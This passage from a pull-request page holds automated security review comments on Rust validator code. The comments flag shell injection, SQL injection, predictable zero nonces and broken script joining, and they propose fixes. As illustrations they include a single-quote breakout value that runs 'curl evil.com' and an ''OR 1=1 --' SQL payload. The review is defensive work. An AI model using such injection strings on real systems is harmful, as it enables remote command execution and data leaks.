trailing zeros). Also fix verify_nonce() to perform a full 32-byte equality
check against the expected nonce (not a prefix compare) so the entire nonce
field is validated.

Comment on lines +274 to +278
let cmd = format!(
"INTEL_API_KEY='{}' bash -c '{}'",
intel_api_key,
tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
);
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Shell injection via unsanitized string interpolation into SSH commands.

intel_api_key is spliced directly into a single-quoted shell string. A value containing a single quote (e.g., key'; curl evil.com #) breaks out of the quoting and executes arbitrary commands on the remote host over SSH.

The same pattern recurs for vm_name in create_test_tdx_vm (lines 770-795), cleanup_test_vm (line 939-943), and the bash -c wrappers in test_guest_quote_generation / wait_for_vm.

At minimum, escape single quotes in every user-supplied value before interpolation (value.replace('\'', "'\\''")) or, better, pass values exclusively through environment variable assignment handled by the SSH transport if supported.

🔒 Proposed fix (configure_pccs example — apply the same pattern everywhere)
     pub async fn configure_pccs(
         &self,
         connection: &SshConnectionDetails,
         intel_api_key: &str,
     ) -> Result<bool> {
         info!("[TDX Host] Configuring PCCS service");

-        // Create command with environment variables
+        // Escape single quotes to prevent shell injection
+        let escaped_key = intel_api_key.replace('\'', "'\\''");
         let cmd = format!(
             "INTEL_API_KEY='{}' bash -c '{}'",
-            intel_api_key,
+            escaped_key,
             tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
         );
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
let cmd = format!(
"INTEL_API_KEY='{}' bash -c '{}'",
intel_api_key,
tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
);
pub async fn configure_pccs(
&self,
connection: &SshConnectionDetails,
intel_api_key: &str,
) -> Result<bool> {
info!("[TDX Host] Configuring PCCS service");
// Escape single quotes to prevent shell injection
let escaped_key = intel_api_key.replace('\'', "'\\''");
let cmd = format!(
"INTEL_API_KEY='{}' bash -c '{}'",
escaped_key,
tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
);
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs` around
lines 274 - 278, The command assembly in validation_tdx_host.rs dangerously
interpolates user-controlled values (e.g., intel_api_key into the local `cmd`
string using `tdx_host::CONFIGURE_PCCS`) and likewise `vm_name` in
`create_test_tdx_vm`, `cleanup_test_vm`, and the `bash -c` wrappers used by
`test_guest_quote_generation`/`wait_for_vm`, which allows shell injection; fix
by escaping single quotes in all interpolated values (replace '\'' with
'\'"\'"\'') before building the `cmd` string or, preferably, stop embedding
values into single-quoted shell lines and pass them via the SSH
transport/environment variable assignment supported by your SSH client, updating
the code paths that build `cmd` (the `intel_api_key` usage and all `vm_name`
interpolations) to use the chosen safe method consistently.

Comment on lines +770 to +774
let create_disk_cmd = format!(
"VM_NAME='{}' bash -c '{}'",
vm_name,
tdx_guest::CREATE_TDX_VM_DISK.replace('\n', "; ").trim()
);
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash

# First, let's find the file and verify its location
echo "=== Locating the file ==="
find . -name "validation_tdx_host.rs" -type f

# Look at the specific lines mentioned in the review
echo ""
echo "=== Examining lines 770-774 ==="
sed -n '770,774p' crates/basilica-validator/src/miner_prover/validation_tdx_host.rs

# Find where tdx_guest and tdx_host constants are defined
echo ""
echo "=== Finding tdx_guest and tdx_host module/constants ==="
find . -name "*.rs" -path "*tdx*" | head -20

Repository: one-covenant/basilica

Length of output: 944


🏁 Script executed:

#!/bin/bash

# Let's search for the imports and constant definitions
echo "=== Checking imports and module structure in validation_tdx_host.rs ==="
head -50 crates/basilica-validator/src/miner_prover/validation_tdx_host.rs

# Find where CREATE_TDX_VM_DISK is defined
echo ""
echo "=== Searching for CREATE_TDX_VM_DISK constant ==="
rg -n "CREATE_TDX_VM_DISK" --type rust -B 2 -A 10

Repository: one-covenant/basilica

Length of output: 5704


🏁 Script executed:

#!/bin/bash

# Find all uses of the replace('\n', "; ") pattern to see the context
echo "=== Finding all uses of replace('\\n', \"; \") pattern ==="
rg -n "replace\('\\\\n'" --type rust crates/basilica-validator/

# Also check for the CREATE_ constants that are being referenced
echo ""
echo "=== Finding tdx_guest module and its constants ==="
find . -name "*.rs" | xargs grep -l "tdx_guest::" | head -5

Repository: one-covenant/basilica

Length of output: 1361


🏁 Script executed:

#!/bin/bash

# Let's look for tdx_guest file directly
echo "=== Looking for tdx_guest.rs or similar ==="
fd -e rs -p tdx_guest

# Check if tdx_guest is a module in the same file or separate
echo ""
echo "=== Checking validation_tdx_host.rs for inline tdx_guest module or external reference ==="
rg -n "mod tdx_guest|use.*tdx_guest" crates/basilica-validator/src/miner_prover/validation_tdx_host.rs

Repository: one-covenant/basilica

Length of output: 320


🏁 Script executed:

#!/bin/bash

# Let's check the full directory structure of miner_prover
echo "=== Listing miner_prover directory ==="
ls -la crates/basilica-validator/src/miner_prover/ 2>/dev/null || find . -path "*miner_prover*" -type d

# And look for any tdx files
echo ""
echo "=== Finding all tdx-related files ==="
find . -name "*tdx*" -type f | grep -v target | grep -v ".git"

Repository: one-covenant/basilica

Length of output: 2154


🏁 Script executed:

#!/bin/bash

# Get more context around line 770
echo "=== Context around lines 770-774 ==="
sed -n '760,780p' crates/basilica-validator/src/miner_prover/validation_tdx_host.rs

# Find what tdx_guest refers to and where CREATE_TDX_VM_DISK is
echo ""
echo "=== Looking for module structure and imports ==="
head -100 crates/basilica-validator/src/miner_prover/validation_tdx_host.rs | grep -A 5 -B 5 "tdx_guest\|mod \|use "

Repository: one-covenant/basilica

Length of output: 1539


🏁 Script executed:

#!/bin/bash

# Search directly for where the constant is defined
echo "=== Finding CREATE_TDX_VM_DISK definition ==="
rg -n "CREATE_TDX_VM_DISK\s*=" --type rust -A 15 crates/basilica-validator/

echo ""
echo "=== Finding all tdx_guest:: constants ==="
rg -n "pub const.*=\s*r?#*\"" --type rust crates/basilica-validator/ | grep -i tdx | head -30

Repository: one-covenant/basilica

Length of output: 153


🏁 Script executed:

#!/bin/bash

# Let's examine the entire file structure
echo "=== File size and structure check ==="
wc -l crates/basilica-validator/src/miner_prover/validation_tdx_host.rs

# Look at the bottom of the file where modules might be defined
echo ""
echo "=== Last 200 lines of the file (might contain module definitions) ==="
tail -200 crates/basilica-validator/src/miner_prover/validation_tdx_host.rs | head -100

Repository: one-covenant/basilica

Length of output: 4131


🏁 Script executed:

#!/bin/bash

# Get the full content of CREATE_TDX_VM_DISK and other constants
echo "=== CREATE_TDX_VM_DISK constant (tdx_guest.rs lines 59-90) ==="
sed -n '59,120p' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

echo ""
echo "=== CREATE_CLOUD_INIT constant ==="
rg -n "pub const CREATE_CLOUD_INIT" --type rust -A 30 crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

echo ""
echo "=== LAUNCH_TDX_VM_QEMU constant ==="
rg -n "pub const LAUNCH_TDX_VM_QEMU" --type rust -A 20 crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs | head -50

Repository: one-covenant/basilica

Length of output: 3568


🏁 Script executed:

#!/bin/bash

# Check for shell comments (#) in any of the guest command constants
echo "=== Searching for # comments in tdx_guest constants ==="
grep -n "pub const" crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

echo ""
echo "=== Checking if any constant contains '#' (comments) ==="
# Get all constants and show their line counts
awk '/pub const.*: &str = r#"/{flag=1; name=$3; start=NR} flag{print} /"#"$/{if(flag) {print "---END " name " (lines " start "-" NR ") ---"; flag=0}}' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs | grep -E "pub const|#|---END"

Repository: one-covenant/basilica

Length of output: 3173


🏁 Script executed:

#!/bin/bash

# Let's get the line count and examine specific constants
wc -l crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

# Find where CREATE_TDX_VM_DISK ends
echo ""
echo "=== CREATE_TDX_VM_DISK full definition ==="
sed -n '59,140p' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

Repository: one-covenant/basilica

Length of output: 2326


🏁 Script executed:

#!/bin/bash

# Get all pub const definitions and their extents
echo "=== All pub const definitions in tdx_guest.rs ==="
grep -n "pub const" crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

# Check each constant for # symbols
echo ""
echo "=== DOWNLOAD_TDX_GUEST_IMAGE ==="
sed -n '35,58p' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

Repository: one-covenant/basilica

Length of output: 1363


🏁 Script executed:

#!/bin/bash

# Now let's look at CREATE_CLOUD_INIT and other constants more carefully
echo "=== All constants and their ranges ==="
awk '/^pub const/{start=NR; name=$0} /^"#"/{if(start) {print start "-" NR ": " name; start=0}}' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

# Simpler approach: show key constants with line numbers
echo ""
echo "=== LAUNCH_TDX_VM_QEMU (around line 120) ==="
sed -n '115,200p' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

Repository: one-covenant/basilica

Length of output: 2825


🏁 Script executed:

#!/bin/bash

# Get the file length and check specific line ranges
total_lines=$(wc -l < crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs)
echo "Total lines in tdx_guest.rs: $total_lines"

# Show all constants more systematically
echo ""
echo "=== All pub const lines with context ==="
grep -n "pub const" crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

# Show CREATE_TDX_VM_DISK more fully
echo ""
echo "=== CREATE_TDX_VM_DISK (lines 59-150) ==="
sed -n '59,150p' crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs

Repository: one-covenant/basilica

Length of output: 3334


The .replace('\n', "; ") pattern breaks shell scripts containing comments and heredocs.

All tdx_guest::* command constants (CREATE_TDX_VM_DISK, CREATE_CLOUD_INIT, LAUNCH_TDX_VM_QEMU, WAIT_FOR_TDX_VM, TEST_GUEST_QUOTE_GEN, CLEANUP_TDX_VM, FULL_TDX_GUEST_TEST) contain shell comments and heredocs. Replacing newlines with "; " will:

  • Cause comments to consume subsequent statements (e.g., # comment\nif ... becomes # comment; if ... where the if is now a comment)
  • Completely break heredoc syntax (e.g., << EOF\n...EOF becomes << EOF; ...; EOF, where EOF is no longer a valid terminator)

This silently corrupts script execution at lines 277, 773, 784, 795, 832, 867, 881, and 942. Write multiline scripts as heredocs in bash (e.g., bash -c '$(cat <<'SCRIPT'\n...\nSCRIPT\n)') or write to temporary files on the remote host.

🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs` around
lines 770 - 774, The code currently uses .replace('\n', "; ") on tdx_guest
script constants which corrupts shell comments and heredocs; change
create_disk_cmd (and all other places using this pattern with
tdx_guest::CREATE_TDX_VM_DISK, CREATE_CLOUD_INIT, LAUNCH_TDX_VM_QEMU,
WAIT_FOR_TDX_VM, TEST_GUEST_QUOTE_GEN, CLEANUP_TDX_VM, FULL_TDX_GUEST_TEST) to
pass the multi-line script as a proper heredoc to bash (or write the script to a
temporary file and execute it) instead of joining lines—construct the command as
a bash -c heredoc (or create temp file) and feed the exact tdx_guest constant
contents without replacing newlines.

Comment on lines +744 to +751
// Read the quote file content (binary)
let quote_bytes = tokio::fs::read(quote_output)
.await
.or_else(|_| {
// If it's not a file path, try to decode as hex
hex::decode(quote_output)
})
.context("Failed to read/decode TDX quote")?;
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

tokio::fs::read(quote_output) always fails — it tries to read SSH stdout as a local file path.

The SSH command runs cat "$TMPFILE" which writes quote contents to stdout. quote_output is the quote data (or hex), not a local file path. tokio::fs::read(quote_output) will attempt to open a local file named with the quote content — guaranteed to fail. The fallback hex::decode is always used. Remove the dead tokio::fs::read path.

Proposed fix
-        // Read the quote file content (binary)
-        let quote_bytes = tokio::fs::read(quote_output)
-            .await
-            .or_else(|_| {
-                // If it's not a file path, try to decode as hex
-                hex::decode(quote_output)
-            })
-            .context("Failed to read/decode TDX quote")?;
+        // The SSH command returns hex-encoded quote data via stdout
+        let quote_bytes = hex::decode(quote_output)
+            .context("Failed to decode TDX quote hex from remote output")?;
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
// Read the quote file content (binary)
let quote_bytes = tokio::fs::read(quote_output)
.await
.or_else(|_| {
// If it's not a file path, try to decode as hex
hex::decode(quote_output)
})
.context("Failed to read/decode TDX quote")?;
// The SSH command returns hex-encoded quote data via stdout
let quote_bytes = hex::decode(quote_output)
.context("Failed to decode TDX quote hex from remote output")?;
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tee.rs` around lines
744 - 751, The code in validation_tee.rs is attempting to read quote_output as a
filesystem path via tokio::fs::read(quote_output) but quote_output is the SSH
stdout (the quote data), so that branch always fails; remove the tokio::fs::read
path and directly decode the quote data (e.g. let quote_bytes =
hex::decode(quote_output).context("Failed to decode TDX quote")?) or otherwise
treat quote_output as the raw bytes received from SSH, updating the error
context accordingly; locate the code around the quote_bytes binding and the
variable quote_output to apply this change.

Comment on lines +938 to +942
// Generate random nonces
let mut tdx_nonce = [0u8; 64];
getrandom::getrandom(&mut tdx_nonce).unwrap_or_default();
let mut gpu_nonce = [0u8; 32];
getrandom::getrandom(&mut gpu_nonce).unwrap_or_default();
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

getrandom failure silently produces all-zero nonces — defeats attestation freshness.

unwrap_or_default() fills the nonce buffer with zeros if getrandom fails. All-zero nonces are predictable and defeat replay protection entirely. This should be a hard error.

Proposed fix
         let mut tdx_nonce = [0u8; 64];
-        getrandom::getrandom(&mut tdx_nonce).unwrap_or_default();
+        getrandom::getrandom(&mut tdx_nonce)
+            .map_err(|e| anyhow::anyhow!("Failed to generate random TDX nonce: {}", e))?;
         let mut gpu_nonce = [0u8; 32];
-        getrandom::getrandom(&mut gpu_nonce).unwrap_or_default();
+        getrandom::getrandom(&mut gpu_nonce)
+            .map_err(|e| anyhow::anyhow!("Failed to generate random GPU nonce: {}", e))?;
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tee.rs` around lines
938 - 942, The current getrandom calls use unwrap_or_default() for tdx_nonce and
gpu_nonce which silently produce all-zero nonces on failure; change this to
treat failures as hard errors: check the Result from getrandom for both calls
and return/propagate an Err (or panic with expect) instead of filling with
zeros. Update the code paths that call/construct tdx_nonce and gpu_nonce in
validation_tee.rs (the getrandom invocations that populate tdx_nonce and
gpu_nonce) so any getrandom::getrandom error is handled explicitly and fails
fast with a clear error message.

Comment on lines +238 to +260
/// Get count of nodes matching TEE requirements
pub async fn count_nodes_matching_tee_requirements(
&self,
require_tdx: bool,
require_gpu_cc: bool,
expected_mrtd_hex: Option<&str>,
) -> Result<u64, anyhow::Error> {
let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");

if require_tdx {
query.push_str(" AND tdx_verified = 1");
}
if require_gpu_cc {
query.push_str(" AND gpu_cc_enabled = 1");
}
if let Some(mrtd) = expected_mrtd_hex {
query.push_str(&format!(" AND tdx_mrtd_hex = '{}'", mrtd));
}

let row = sqlx::query(&query).fetch_one(&self.pool).await?;

Ok(row.get::<i64, _>("count") as u64)
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

SQL injection vulnerability via string interpolation of mrtd value.

Line 254 directly interpolates user-supplied expected_mrtd_hex into the SQL string with format!(" AND tdx_mrtd_hex = '{}'", mrtd). This is a classic SQL injection vector — a crafted mrtd value like ' OR 1=1 -- can bypass filters or leak data.

Use parameterized binding instead:

Proposed fix
     pub async fn count_nodes_matching_tee_requirements(
         &self,
         require_tdx: bool,
         require_gpu_cc: bool,
         expected_mrtd_hex: Option<&str>,
     ) -> Result<u64, anyhow::Error> {
-        let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
+        let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
+        let mut bindings: Vec<String> = Vec::new();
 
         if require_tdx {
             query.push_str(" AND tdx_verified = 1");
         }
         if require_gpu_cc {
             query.push_str(" AND gpu_cc_enabled = 1");
         }
-        if let Some(mrtd) = expected_mrtd_hex {
-            query.push_str(&format!(" AND tdx_mrtd_hex = '{}'", mrtd));
+        if let Some(mrtd) = expected_mrtd_hex {
+            query.push_str(" AND tdx_mrtd_hex = ?");
+            bindings.push(mrtd.to_string());
         }
 
-        let row = sqlx::query(&query).fetch_one(&self.pool).await?;
+        let mut q = sqlx::query(&query);
+        for b in &bindings {
+            q = q.bind(b);
+        }
+        let row = q.fetch_one(&self.pool).await?;
 
         Ok(row.get::<i64, _>("count") as u64)
     }
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
/// Get count of nodes matching TEE requirements
pub async fn count_nodes_matching_tee_requirements(
&self,
require_tdx: bool,
require_gpu_cc: bool,
expected_mrtd_hex: Option<&str>,
) -> Result<u64, anyhow::Error> {
let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
if require_tdx {
query.push_str(" AND tdx_verified = 1");
}
if require_gpu_cc {
query.push_str(" AND gpu_cc_enabled = 1");
}
if let Some(mrtd) = expected_mrtd_hex {
query.push_str(&format!(" AND tdx_mrtd_hex = '{}'", mrtd));
}
let row = sqlx::query(&query).fetch_one(&self.pool).await?;
Ok(row.get::<i64, _>("count") as u64)
}
/// Get count of nodes matching TEE requirements
pub async fn count_nodes_matching_tee_requirements(
&self,
require_tdx: bool,
require_gpu_cc: bool,
expected_mrtd_hex: Option<&str>,
) -> Result<u64, anyhow::Error> {
let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
let mut bindings: Vec<String> = Vec::new();
if require_tdx {
query.push_str(" AND tdx_verified = 1");
}
if require_gpu_cc {
query.push_str(" AND gpu_cc_enabled = 1");
}
if let Some(mrtd) = expected_mrtd_hex {
query.push_str(" AND tdx_mrtd_hex = ?");
bindings.push(mrtd.to_string());
}
let mut q = sqlx::query(&query);
for b in &bindings {
q = q.bind(b);
}
let row = q.fetch_one(&self.pool).await?;
Ok(row.get::<i64, _>("count") as u64)
}
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/persistence/tee_profile.rs` around lines 238 -
260, The count_nodes_matching_tee_requirements function builds SQL by
interpolating expected_mrtd_hex directly, causing SQL injection; change the
implementation to append a parameter placeholder (e.g. " AND tdx_mrtd_hex = ?")
when expected_mrtd_hex is Some(...) and pass the mrtd value via sqlx binding
instead of format! interpolation—use sqlx::query (or query_scalar) and call
.bind(mrtd) (or appropriate typed bind) before fetch_one/fetch_optional so the
tdx_mrtd_hex filter is applied safely without string concatenation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant